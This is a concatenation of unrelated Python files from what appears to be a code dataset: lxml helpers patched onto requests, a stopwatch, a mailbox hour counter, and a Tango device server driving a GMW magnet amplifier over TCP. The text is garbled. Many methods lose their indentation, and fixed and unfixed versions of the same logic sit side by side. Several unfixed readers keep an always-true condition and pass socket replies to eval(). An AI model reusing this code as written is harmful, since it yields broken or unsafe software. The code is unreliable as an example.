    markup = lxml.etree.tostring(xml, pretty_print=True)
    return markup
def xml_fromstring(s):
    """Parse an XML string into an lxml XML tree."""
    tree = lxml.etree.fromstring(s)
    return tree
# Attach the helpers (and the underlying lxml modules) onto the imported
# `requests` module object, so callers that import requests after this module
# can do e.g. requests.html(url) or requests.lxml.etree.tostring(...).
requests.html = html
requests.html_tostring = html_tostring
requests.html_fromstring = html_fromstring
requests.xml = xml
requests.xml_tostring = xml_tostring
requests.xml_fromstring = xml_fromstring
requests.lxml = lxml
requests.lxml.html = lxml.html
requests.lxml.etree = lxml.etree
|
21,544 | 5ea888d03aa76798477748bccbbed5b9e7330c75 | import time
from contextlib import contextmanager
class Clock:
    """One-shot stopwatch based on time.time().

    The elapsed value is frozen by the first call to stop(); reading
    ``elapsed`` before stopping stops the clock implicitly.
    """
    def __init__(self):
        self.start = time.time()
        self._elapsed = None
    @property
    def elapsed(self):
        """Seconds from construction until stop(); stops lazily on first read."""
        if self._elapsed is not None:
            return self._elapsed
        self.stop()
        return self._elapsed
    def stop(self):
        """Freeze the elapsed time (calling again re-measures from start)."""
        self._elapsed = time.time() - self.start
@contextmanager
def timer():
    """Context manager yielding a running Clock, stopped on normal exit."""
    running = Clock()
    yield running
    running.stop()
|
fname = input('Enter a file name: ')
try:
    fopen = open(fname)
except FileNotFoundError:
    print('file not found!')
    exit()
# Histogram of the hour-of-day on each 'From' line of a mailbox file
# (the timestamp is the sixth token, e.g. 'From x@y Sat Jan 5 09:14:16 2008').
count = dict()
for line in fopen:
    words = line.split()
    # BUG FIX: the original ran this guard and the hour extraction inside a
    # `for word in words` loop, so every 'From' line was counted once per
    # word on the line instead of once. The length guard also protects the
    # words[5] access against short lines.
    if len(words) < 6 or words[0] != 'From':
        continue
    hour = words[5].split(':')[0]
    count[hour] = count.get(hour, 0) + 1
print(count)
# print the hours in ascending order
for key, val in sorted(count.items()):
    print(key, val)
21,546 | e5e648c3922198ce66f5ec43c4fc5e679931450b | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# ############################################################################
# license :
# ============================================================================
#
# File : GMW.py
#
# Project : GMW
#
# This file is part of Tango device class.
#
# Tango is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Tango is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Tango. If not, see <http://www.gnu.org/licenses/>.
#
#
# $Author : sci.comp$
#
# $Revision : $
#
# $Date : $
#
# $HeadUrl : $
# ============================================================================
# This file is generated by POGO
# (Program Obviously used to Generate tango Object)
# ############################################################################
__all__ = ["GMW", "GMWClass", "main"]
__docformat__ = 'restructuredtext'
import PyTango
import sys
# Add additional import
#----- PROTECTED REGION ID(GMW.additionnal_import) ENABLED START -----#
import socket
import select
import traceback
import numpy as np
#----- PROTECTED REGION END -----# // GMW.additionnal_import
# Device States Description
# INIT : The Device goes into this State during initialization..
# ON : The Device is in this State when the PicoFLEX is switched on and in normal \noperation.
# OFF : The Device is in this State when the PicoFlex is switched OFF.
# FAULT : The tangoDevice enters this state when there is an erro, e.g. a communication error.
class GMW (PyTango.Device_4Impl):
"""This Tango Device Class is used to set and readout
the GMW 231HC model current amplifier."""
# -------- Add you global variables here --------------------------
#----- PROTECTED REGION ID(GMW.global_variables) ENABLED START -----#
# Measured values to be used for the interpolation to set and read out the magnetic field
current_monitor = [-7.0074,-6.6513,-6.3081,-5.9527,-5.5980,-5.2580,-4.9136,-4.5479,-4.2073,-3.8577,-3.4971,-3.1501,-2.7969,-2.4454,-2.1084,-1.7436,-1.3934,-1.0512,-0.7035,-0.3513,0.0010,0.3513,0.7035,1.0512,1.3934,1.7436,2.1084,2.4454,2.7969,3.1501,3.4971,3.8577,4.2073,4.5479,4.9136,5.2580,5.5980,5.9527,6.3081,6.6513,7.0074]
voltage_monitor = [-2.1380,-2.0597,-1.9292,-1.8335,-1.7233,-1.5989,-1.5029,-1.3802,-1.3012,-1.1778,-1.0840,-0.9784,-0.8649,-0.7628,-0.6584,-0.5434,-0.4406,-0.3339,-0.2166,-0.1058,0.0088,0.1058,0.2166,0.3339,0.4406,0.5434,0.6584,0.7628,0.8649,0.9784,1.0840,1.1778,1.3012,1.3802,1.5029,1.5989,1.7233,1.8335,1.9292,2.0597,2.1380]
magnetic_field = [-17.40,-17.35,-17.10,-17.00,-16.82,-16.6,-16.38,-16.12,-15.93,-15.46,-14.9,-14.4,-13.6,-12.49,-11.02,-9.29,-7.477,-5.64,-3.78,-1.90,0,1.90,3.78,5.64,7.477,9.29,11.02,12.49,13.6,14.4,14.9,15.46,15.93,16.12,16.38,16.6,16.82,17.00,17.10,17.35,17.40]
v_output = [-10,-9.5,-9,-8.5,-8,-7.5,-7,-6.5,-6,-5.5,-5,-4.5,-4,-3.5,-3,-2.5,-2,-1.5,-1,-0.5,0,0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10]
#----- PROTECTED REGION END -----# // GMW.global_variables
    def __init__(self, cl, name):
        """Construct the Tango device and run init_device()."""
        PyTango.Device_4Impl.__init__(self,cl,name)
        self.debug_stream("In __init__()")
        GMW.init_device(self)
        #----- PROTECTED REGION ID(GMW.__init__) ENABLED START -----#
        #----- PROTECTED REGION END -----# // GMW.__init__
    def delete_device(self):
        """Hook called when the device is destroyed; nothing to release here."""
        self.debug_stream("In delete_device()")
        #----- PROTECTED REGION ID(GMW.delete_device) ENABLED START -----#
        #----- PROTECTED REGION END -----# // GMW.delete_device
    def init_device(self):
        """Initialise the attribute caches and open the TCP socket to the controller."""
        self.debug_stream("In init_device()")
        self.get_device_properties(self.get_device_class())
        # cached values backing the Tango attributes, refreshed by the readers
        self.attr_magnetField_read = 0.0
        self.attr_currentMonitor_read = 0.0
        self.attr_voltageMonitor_read = 0.0
        self.attr_fieldMonitorPlus_read = 0.0
        self.attr_fieldMonitorMinus_read = 0.0
        self.attr_amplifierPower_read = False
        self.attr_normal_read = False
        self.attr_inhibit_read = False
        self.attr_moduleFault_read = False
        self.attr_dcFault_read = False
        self.attr_overCurrent_read = False
        self.attr_overTemperature_read = False
        self.attr_interlockStatus_read = False
        self.attr_magnetField_target_read = 0.0
        #----- PROTECTED REGION ID(GMW.init_device) ENABLED START -----#
        self.set_state(PyTango.DevState.INIT)
        self.set_status("Initialising Tango Device...")
        self.debug_stream("Initialising Tango Device...")
        # TCP connection to the amplifier's control server
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket_connect()
        #----- PROTECTED REGION END -----# // GMW.init_device
    def always_executed_hook(self):
        """Called before every command/attribute access; no per-call work needed."""
        self.debug_stream("In always_excuted_hook()")
        #----- PROTECTED REGION ID(GMW.always_executed_hook) ENABLED START -----#
        #----- PROTECTED REGION END -----# // GMW.always_executed_hook
# -------------------------------------------------------------------------
# GMW read/write attribute methods
# -------------------------------------------------------------------------
    def read_magnetField(self, attr):
        """Derive the magnetic field (kGauss) from the measured monitor voltage.

        Reads the voltage via self.read_voltage() and linearly interpolates it
        through the (voltage_monitor -> magnetic_field) calibration tables.
        """
        self.debug_stream("In read_magnetField()")
        #----- PROTECTED REGION ID(GMW.magnetField_read) ENABLED START -----#
        # We have to calculate the magnetic field from the voltage_monitor
        voltage = self.read_voltage()
        self.debug_stream("Volt monitor = " + str(voltage))
        self.debug_stream("Converting " + str(voltage) + " Volts in Magnetic Field...")
        newMagField = np.interp(voltage,
                                self.voltage_monitor,
                                self.magnetic_field)
        self.debug_stream("Magnetic Field = " + str(newMagField) + " kGauss")
        self.attr_magnetField_read = newMagField
        attr.set_value(self.attr_magnetField_read)
        #----- PROTECTED REGION END -----# // GMW.magnetField_read
    def write_magnetField(self, attr):
        """Set the magnetic field: interpolate kGauss -> output volts, send 'set_voltage <V>'.

        Maps the requested field through the (magnetic_field -> v_output)
        calibration tables; a '*** KEY ERROR' reply raises a Tango exception.
        """
        self.debug_stream("In write_magnetField()")
        data = attr.get_write_value()
        #----- PROTECTED REGION ID(GMW.magnetField_write) ENABLED START -----#
        self.set_status("Reading/writing data")
        # NOTE(review): %d truncates the float setpoint in this debug message
        self.debug_stream("Converting %d kGauss in Volts...", data )
        # NOTE(review): stored on attr_magnetField_target, but the attribute's
        # read variable is attr_magnetField_target_read -- confirm intended
        self.attr_magnetField_target = data
        volt = np.interp(data, self.magnetic_field, self.v_output)
        cmd_str="set_voltage " + str(volt)
        resp_err = "*** KEY ERROR"
        resp = self.socket_write_and_read(cmd_str)
        if resp.rstrip("\r\n") == resp_err:
            self.set_state(PyTango.DevState.WARNING)
            self.set_status("Incorrect request, check command syntax!")
            self.debug_stream("Incorrect request, check command syntax!")
            PyTango.Except.throw_exception('Communication Error','Command not acknowledged','write_magnetField()')
        if self.get_state() != PyTango.DevState.ON:
            self.set_state(PyTango.DevState.ON)
        #----- PROTECTED REGION END -----# // GMW.magnetField_write
    def read_currentMonitor(self, attr):
        """Read the amplifier current monitor (A), rounded to 3 decimals.

        Sends 'read_current' over the control socket; a '*** KEY ERROR' reply
        raises a Tango exception, a non-numeric reply puts the device in WARNING.
        """
        self.debug_stream("In read_currentMonitor()")
        #----- PROTECTED REGION ID(GMW.currentMonitor_read) ENABLED START -----#
        self.set_status("Reading/writing data")
        cmd_str="read_current"
        resp_err = "*** KEY ERROR"
        resp = self.socket_write_and_read(cmd_str)
        sresp = resp.rstrip("\r\n")
        if sresp == resp_err:
            self.set_state(PyTango.DevState.WARNING)
            self.set_status("Incorrect request, check command syntax!")
            self.debug_stream("Incorrect request, check command syntax!")
            PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_currentMonitor()')
        else:
            try:
                self.attr_currentMonitor_read = float("{0:.3f}".format(float(sresp)))
                attr.set_value(self.attr_currentMonitor_read)
            except ValueError:
                self.set_state(PyTango.DevState.WARNING)
                # NOTE(review): "replay" in this status string is a typo for "reply"
                self.set_status("Incorrect replay! Expected a float, received " +sresp )
                self.debug_stream("Incorrect reply! Expected a float, received " +sresp )
        if self.get_state() != PyTango.DevState.ON:
            self.set_state(PyTango.DevState.ON)
        #----- PROTECTED REGION END -----# // GMW.currentMonitor_read
def read_voltageMonitor(self, attr):
self.debug_stream("In read_voltageMonitor()")
#----- PROTECTED REGION ID(GMW.voltageMonitor_read) ENABLED START -----#
self.set_status("Reading/writing data")
cmd_str="read_voltage"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if sresp == resp_err:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect request, check command syntax!")
self.debug_stream("Incorrect request, check command syntax!")
PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_voltageMonitor()')
else:
try:
self.attr_voltageMonitor_read = float("{0:.3f}".format(float(resp)))
attr.set_value(self.attr_voltageMonitor_read)
except ValueError:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect replay! Expected a float, received " +sresp )
self.debug_stream("Incorrect reply! Expected a float, received " +sresp )
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.voltageMonitor_read
    def read_fieldMonitorPlus(self, attr):
        """Read the positive field monitor value, rounded to 3 decimals.

        Sends 'read_field_plus' over the control socket; a '*** KEY ERROR'
        reply raises a Tango exception, a non-numeric reply sets WARNING.
        """
        self.debug_stream("In read_fieldMonitorPlus()")
        #----- PROTECTED REGION ID(GMW.fieldMonitorPlus_read) ENABLED START -----#
        self.set_status("Reading/writing data")
        cmd_str="read_field_plus"
        resp_err = "*** KEY ERROR"
        resp = self.socket_write_and_read(cmd_str)
        sresp = resp.rstrip("\r\n")
        # NOTE(review): re-strips resp here although sresp already holds it
        if resp.rstrip("\r\n") == resp_err:
            self.set_state(PyTango.DevState.WARNING)
            self.set_status("Incorrect request, check command syntax!")
            self.debug_stream("Incorrect request, check command syntax!")
            PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_fieldMonitorPlus()')
        else:
            try:
                self.attr_fieldMonitorPlus_read = float("{0:.3f}".format(float(sresp)))
                attr.set_value(self.attr_fieldMonitorPlus_read)
            except ValueError:
                self.set_state(PyTango.DevState.WARNING)
                # NOTE(review): "replay" in this status string is a typo for "reply"
                self.set_status("Incorrect replay! Expected a float, received " +sresp )
                self.debug_stream("Incorrect reply! Expected a float, received " +sresp )
        if self.get_state() != PyTango.DevState.ON:
            self.set_state(PyTango.DevState.ON)
        #----- PROTECTED REGION END -----# // GMW.fieldMonitorPlus_read
def read_fieldMonitorMinus(self, attr):
self.debug_stream("In read_fieldMonitorMinus()")
#----- PROTECTED REGION ID(GMW.fieldMonitorMinus_read) ENABLED START -----#
self.set_status("Reading/writing data")
cmd_str="read_field_minus"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if resp.rstrip("\r\n") == resp_err:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect request, check command syntax!")
self.debug_stream("Incorrect request, check command syntax!")
PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_fieldMonitorMinus()')
else:
try:
self.attr_fieldMonitorMinus_read = float("{0:.3f}".format(float(resp)))
attr.set_value(self.attr_fieldMonitorMinus_read)
except ValueError:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect replay! Expected a float, received " +sresp )
self.debug_stream("Incorrect reply! Expected a float, received " +sresp )
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.fieldMonitorMinus_read
def read_amplifierPower(self, attr):
self.debug_stream("In read_amplifierPower()")
#----- PROTECTED REGION ID(GMW.amplifierPower_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_amplifier_power"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect raply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
PyTango.Except.throw_exception('Communication Error','Bad answer','read_amplifierPower()')
else:
self.attr_amplifierPower_read = eval(sresp)
attr.set_value(self.attr_amplifierPower_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.amplifierPower_read
def read_normal(self, attr):
self.debug_stream("In read_normal()")
#----- PROTECTED REGION ID(GMW.normal_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_normal"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect raply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
PyTango.Except.throw_exception('Communication Error','Bad answer','read_normal()')
else:
self.attr_normal_read = eval(sresp)
attr.set_value(self.attr_normal_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.normal_read
def read_inhibit(self, attr):
self.debug_stream("In read_inhibit()")
#----- PROTECTED REGION ID(GMW.inhibit_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_inhibit"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect reply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
PyTango.Except.throw_exception('Communication Error','Bad answer','read_inhibit()')
else:
self.attr_inhibit_read = eval(sresp)
attr.set_value(self.attr_inhibit_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.inhibit_read
def read_moduleFault(self, attr):
    """Read the MOSFET 'module fault' boolean flag from the hardware.

    Expects the literal string ``True`` or ``False``; anything else puts
    the device in WARNING and raises a DevFailed exception.
    """
    self.debug_stream("In read_moduleFault()")
    #----- PROTECTED REGION ID(GMW.moduleFault_read) ENABLED START -----#
    self.set_status("Reading data")
    cmd_str = "read_module_fault"
    resp_err = "*** KEY ERROR"
    resp = self.socket_write_and_read(cmd_str)
    sresp = resp.rstrip("\r\n")
    # BUG FIX: original "or"-chained inequality test was always true, making
    # the success branch unreachable.
    if sresp == resp_err or sresp not in ("True", "False"):
        self.set_state(PyTango.DevState.WARNING)
        self.set_status("Incorrect reply, check command syntax!")
        self.debug_stream("Incorrect reply: " + sresp)
        PyTango.Except.throw_exception('Communication Error', 'Bad answer', 'read_moduleFault')
    else:
        # Explicit boolean parse instead of eval() on network data.
        self.attr_moduleFault_read = (sresp == "True")
        attr.set_value(self.attr_moduleFault_read)
        if self.get_state() != PyTango.DevState.ON:
            self.set_state(PyTango.DevState.ON)
    #----- PROTECTED REGION END -----# // GMW.moduleFault_read
def read_dcFault(self, attr):
    """Read the 'DC fault' boolean status flag from the hardware.

    Expects the literal string ``True`` or ``False``; anything else puts
    the device in WARNING and raises a DevFailed exception.
    """
    self.debug_stream("In read_dcFault()")
    #----- PROTECTED REGION ID(GMW.dcFault_read) ENABLED START -----#
    self.set_status("Reading data")
    cmd_str = "read_dc_fault"
    resp_err = "*** KEY ERROR"
    resp = self.socket_write_and_read(cmd_str)
    sresp = resp.rstrip("\r\n")
    # BUG FIX: original "or"-chained inequality test was always true, making
    # the success branch unreachable.
    if sresp == resp_err or sresp not in ("True", "False"):
        self.set_state(PyTango.DevState.WARNING)
        self.set_status("Incorrect reply, check command syntax!")
        self.debug_stream("Incorrect reply: " + sresp)
        PyTango.Except.throw_exception('Communication Error', 'Bad answer', 'read_dcFault()')
    else:
        # Explicit boolean parse instead of eval() on network data.
        self.attr_dcFault_read = (sresp == "True")
        attr.set_value(self.attr_dcFault_read)
        if self.get_state() != PyTango.DevState.ON:
            self.set_state(PyTango.DevState.ON)
    #----- PROTECTED REGION END -----# // GMW.dcFault_read
def read_overCurrent(self, attr):
    """Read the 'over current' boolean status flag from the hardware.

    Expects the literal string ``True`` or ``False``; anything else puts
    the device in WARNING and raises a DevFailed exception.
    """
    self.debug_stream("In read_overCurrent()")
    #----- PROTECTED REGION ID(GMW.overCurrent_read) ENABLED START -----#
    self.set_status("Reading data")
    cmd_str = "read_over_current"
    resp_err = "*** KEY ERROR"
    resp = self.socket_write_and_read(cmd_str)
    sresp = resp.rstrip("\r\n")
    # BUG FIX: original "or"-chained inequality test was always true, making
    # the success branch unreachable.
    if sresp == resp_err or sresp not in ("True", "False"):
        self.set_state(PyTango.DevState.WARNING)
        self.set_status("Incorrect reply, check command syntax!")
        self.debug_stream("Incorrect reply: " + sresp)
        PyTango.Except.throw_exception('Communication Error', 'Bad answer', 'read_overCurrent()')
    else:
        # Explicit boolean parse instead of eval() on network data.
        self.attr_overCurrent_read = (sresp == "True")
        attr.set_value(self.attr_overCurrent_read)
        if self.get_state() != PyTango.DevState.ON:
            self.set_state(PyTango.DevState.ON)
    #----- PROTECTED REGION END -----# // GMW.overCurrent_read
def read_overTemperature(self, attr):
    """Read the 'over temperature' boolean status flag from the hardware.

    Expects the literal string ``True`` or ``False``; anything else puts
    the device in WARNING and raises a DevFailed exception.
    """
    self.debug_stream("In read_overTemperature()")
    #----- PROTECTED REGION ID(GMW.overTemperature_read) ENABLED START -----#
    self.set_status("Reading data")
    cmd_str = "read_over_temperature"
    resp_err = "*** KEY ERROR"
    resp = self.socket_write_and_read(cmd_str)
    sresp = resp.rstrip("\r\n")
    # BUG FIX: original "or"-chained inequality test was always true, making
    # the success branch unreachable.
    if sresp == resp_err or sresp not in ("True", "False"):
        self.set_state(PyTango.DevState.WARNING)
        self.set_status("Incorrect reply, check command syntax!")
        self.debug_stream("Incorrect reply: " + sresp)
        PyTango.Except.throw_exception('Communication Error', 'Bad answer', 'read_overTemperature()')
    else:
        # Explicit boolean parse instead of eval() on network data.
        self.attr_overTemperature_read = (sresp == "True")
        attr.set_value(self.attr_overTemperature_read)
        if self.get_state() != PyTango.DevState.ON:
            self.set_state(PyTango.DevState.ON)
    #----- PROTECTED REGION END -----# // GMW.overTemperature_read
def read_interlockStatus(self, attr):
    """Read the interlock boolean status flag from the hardware.

    Expects the literal string ``True`` or ``False``; anything else puts
    the device in WARNING and raises a DevFailed exception.
    """
    self.debug_stream("In read_interlockStatus()")
    #----- PROTECTED REGION ID(GMW.interlockStatus_read) ENABLED START -----#
    self.set_status("Reading data")
    cmd_str = "read_interlock"
    resp_err = "*** KEY ERROR"
    resp = self.socket_write_and_read(cmd_str)
    sresp = resp.rstrip("\r\n")
    # BUG FIX: original "or"-chained inequality test was always true, making
    # the success branch unreachable.
    if sresp == resp_err or sresp not in ("True", "False"):
        self.set_state(PyTango.DevState.WARNING)
        self.set_status("Incorrect reply, check command syntax!")
        self.debug_stream("Incorrect reply: " + sresp)
        PyTango.Except.throw_exception('Communication Error', 'Bad answer', 'read_interlockStatus()')
    else:
        # Explicit boolean parse instead of eval() on network data.
        self.attr_interlockStatus_read = (sresp == "True")
        attr.set_value(self.attr_interlockStatus_read)
        if self.get_state() != PyTango.DevState.ON:
            self.set_state(PyTango.DevState.ON)
    #----- PROTECTED REGION END -----# // GMW.interlockStatus_read
def read_magnetField_target(self, attr):
    """Serve the cached magnetic-field target value (no hardware access)."""
    self.debug_stream("In read_magnetField_target()")
    #----- PROTECTED REGION ID(GMW.magnetField_target_read) ENABLED START -----#
    # Presumably kept in sync by the magnetField write handler -- TODO confirm
    # against the writer; this method never talks to the socket.
    attr.set_value(self.attr_magnetField_target_read)
    #----- PROTECTED REGION END -----# // GMW.magnetField_target_read
def read_attr_hardware(self, data):
    """Tango hook invoked before a batch of attribute reads; intentionally empty."""
    self.debug_stream("In read_attr_hardware()")
    #----- PROTECTED REGION ID(GMW.read_attr_hardware) ENABLED START -----#
    #----- PROTECTED REGION END -----# // GMW.read_attr_hardware
# -------------------------------------------------------------------------
# GMW command methods
# -------------------------------------------------------------------------
#----- PROTECTED REGION ID(GMW.programmer_methods) ENABLED START -----#
def isGmwAlive(self):
    """Probe the hardware via ``read_module_fault``.

    Returns 1 when the MOSFET module reports working ("True"), 0 when it
    reports a fault ("False").  Raises a DevFailed exception on a key
    error or on any unexpected reply.
    """
    self.debug_stream("In isGmwAlive()")
    self.set_status("Reading/writing data")
    cmd_str = "read_module_fault"
    resp_err = "*** KEY ERROR"
    resp_true = "True"
    resp_false = "False"
    resp = self.socket_write_and_read(cmd_str)
    self.debug_stream("Received: " + str(resp))
    # Strip once instead of re-stripping in every branch.
    sresp = resp.rstrip("\r\n")
    if sresp == resp_err:
        self.set_state(PyTango.DevState.WARNING)
        self.set_status("Incorrect request, check socket status !")
        self.debug_stream("Incorrect request, check socket status !")
        PyTango.Except.throw_exception('Communication Error', 'No reply from device', 'isGmwAlive()')
    elif sresp == resp_false:
        self.debug_stream("MOSFET Module Fault")
        # NOTE(review): stored as the string "False" although the attribute is
        # DevBoolean elsewhere -- kept as-is for compatibility; confirm.
        self.attr_moduleFault_read = "False"
        return 0
    elif sresp == resp_true:
        self.debug_stream("MOSFET Module Working!")
        self.attr_moduleFault_read = "True"
        return 1
    # BUG FIX: the original fell off the end and silently returned None for
    # any other reply; fail loudly instead.
    self.set_state(PyTango.DevState.WARNING)
    self.debug_stream("Unexpected reply: " + sresp)
    PyTango.Except.throw_exception('Communication Error', 'Bad answer', 'isGmwAlive()')
def read_current(self):
    """Query the output current and return it as a float rounded to 5 decimals.

    Raises a DevFailed exception on a key-error reply or an empty reply.
    """
    self.debug_stream("In read_current()")
    cmd_str = "read_current"
    resp_err = "*** KEY ERROR"
    resp = self.socket_write_and_read(cmd_str)
    sresp = resp.rstrip("\r\n")
    if sresp == resp_err:
        self.set_state(PyTango.DevState.FAULT)
        self.set_status("Incorrect request, check command syntax!")
        self.debug_stream("Incorrect request, check command syntax!")
        PyTango.Except.throw_exception('Communication Error', 'Command not acknowledged', 'read_current()')
    if resp == '':
        # BUG FIX: mirror read_voltage's guard -- without it float('') raised
        # a bare ValueError instead of a meaningful DevFailed.
        self.set_state(PyTango.DevState.WARNING)
        self.set_status("The device responded with an empty string")
        self.debug_stream("Incorrect reply: the device responded with an empty string!")
        PyTango.Except.throw_exception('Communication Error', 'Command not acknowledged', 'read_current()')
    if self.get_state() != PyTango.DevState.ON:
        self.set_state(PyTango.DevState.ON)
    # Convert the stripped reply (consistent with read_voltage).
    return float("{0:.5f}".format(float(sresp)))
def read_voltage(self):
    """Query the output voltage and return it as a float rounded to 5 decimals.

    Raises a DevFailed exception on a key-error reply or an empty reply;
    otherwise restores the ON state before returning.
    """
    self.debug_stream("In read_voltage()")
    cmd_str = "read_voltage"
    resp_err = "*** KEY ERROR"
    resp = self.socket_write_and_read(cmd_str)
    stripped = resp.rstrip("\r\n")
    if stripped == resp_err:
        self.set_state(PyTango.DevState.WARNING)
        self.set_status("Incorrect request, check command syntax!")
        self.debug_stream("Incorrect request, check command syntax!")
        PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_voltage()')
    if resp == '':
        self.set_state(PyTango.DevState.WARNING)
        self.set_status("The device responded with an empty string")
        self.debug_stream("Incorrect reply: the device responded with an empty string!")
        PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_voltage()')
    if self.get_state() != PyTango.DevState.ON:
        self.set_state(PyTango.DevState.ON)
    return float("{0:.5f}".format(float(stripped)))
#------------------------------------------------------------------
# Connect socket utility
# Tries to connect and set device state
#------------------------------------------------------------------
def socket_connect(self):
    """(Re)open the TCP connection to the GMW hardware.

    Closes and discards any previous socket, then connects to
    ``self.ip_address:self.port`` with a 1 s timeout.  On failure the
    device is put in FAULT and the error is logged.
    """
    try:
        # Drop any stale socket before reconnecting.
        self.s.close()
        del self.s
    except Exception:
        # First call: no previous socket to clean up.
        pass
    try:
        # Connects to GMW hardware...
        self.set_state(PyTango.DevState.ON)
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.settimeout(1)
        self.s.connect((self.ip_address, self.port))
        # BUG FIX: replaced a stray Python 2 `print` of the endpoint (raw
        # stdout noise) with the device debug stream; also switched to the
        # `except ... as e` form, valid on both Python 2.6+ and 3.
        self.debug_stream("Connected to %s:%s" % (self.ip_address, self.port))
        self.debug_stream("After connect")
    except socket.error as e:
        self.set_state(PyTango.DevState.FAULT)
        self.set_status("init_device() FAILED")
        self.error_stream("Couldn't connect with the socket: %s" % e)
#------------------------------------------------------------------
# Read/write socket utility
# Returns a string in case of a proper reply,
# 0 for failure, 1 for succesful reply, 2 for NAK.
#------------------------------------------------------------------
def socket_write_and_read(self, argin):
    """Send *argin* (CRLF-terminated) over the socket and return the reply.

    Reconnects first when the device is in FAULT.  Up to ``max_attempts``
    tries; each try waits up to 0.5 s via select() and then accumulates
    recv() chunks until a CRLF is seen.  Returns the raw reply string on
    success; raises a DevFailed exception on socket errors, other
    exceptions, or when no reply arrives at all.
    """
    if self.get_state() == PyTango.DevState.FAULT:
        self.socket_connect()
        if self.get_state() != PyTango.DevState.ON:
            PyTango.Except.throw_exception('Communication Error','Socket Connection Error','socket_write_and_read()')
    self.debug_stream("In socket_write_and_read()")
    self.set_status("Reading/writing socket")
    resp_err = "*** KEY ERROR"
    argin = str(argin)
    # Normalize the terminator: strip any caller-supplied CRLF, append one.
    picocommand = argin.rstrip('\r\n')+"\r\n"
    attempts = 0
    max_attempts = 2 # In an exception, retry once.
    while (attempts < max_attempts):
        try:
            attempts += 1
            reply=''
            self.debug_stream("Sending command " + picocommand.rstrip('\r\n') + " to GMW...")
            self.s.send(picocommand)
            read_list = [self.s]
            # Wait up to 0.5 s for the socket to become readable.
            readable,writable,errored = select.select(read_list,[],[],0.5)
            for rsock in readable:
                if self.s is rsock:
                    #reply = ''
                    # Accumulate chunks until a full CRLF-terminated line.
                    while "\r\n" not in reply:
                        read_data = self.s.recv(1024)
                        reply += read_data
                    self.debug_stream("Data received: " + str(reply.rstrip('\r\n')))
                    # NOTE(review): compares the unstripped reply against
                    # resp_err, so a CRLF-terminated error string falls
                    # through to the len(reply) > 0 branch -- confirm intent.
                    if reply == resp_err:
                        self.status_string = "Cmd " + picocommand + " failed, no reply"
                        self.debug_stream("Command " + picocommand + " failed")
                        #return 0
                    elif len(reply) > 0:
                        return reply
        except socket.error:
            self.set_state(PyTango.DevState.FAULT)
            # NOTE(review): throw_exception raises, so the two stream calls
            # below are unreachable.
            PyTango.Except.throw_exception('Communication Error','Socket Error','socket_write_and_read()')
            self.error_stream("Socket connection raised exception ")
            self.debug_stream("Socket connection raised exception ")
        except Exception:
            self.set_state(PyTango.DevState.FAULT)
            # NOTE(review): same here -- the traceback dump is unreachable.
            PyTango.Except.throw_exception('Communication Error','General Communication Error','socket_write_and_read()')
            err_msg = traceback.print_exc(file=sys.stdout)
            self.debug_stream("Exception thrown: "+ str(err_msg))
    # Socket problem persists, set state to FAULT
    self.set_state(PyTango.DevState.FAULT)
    PyTango.Except.throw_exception('Communication Error','No reply from device','socket_write_and_read()')
class GMWClass(PyTango.DeviceClass):
    """Tango DeviceClass for the GMW power-supply server.

    Declares the device properties (TCP endpoint) and the attribute
    metadata (labels, units, descriptions) used by the GMW device.
    """
    # -------- Add your global class variables here --------------------------
    #----- PROTECTED REGION ID(GMW.global_class_variables) ENABLED START -----#
    #----- PROTECTED REGION END -----# // GMW.global_class_variables

    # Class Properties
    class_property_list = {
        }

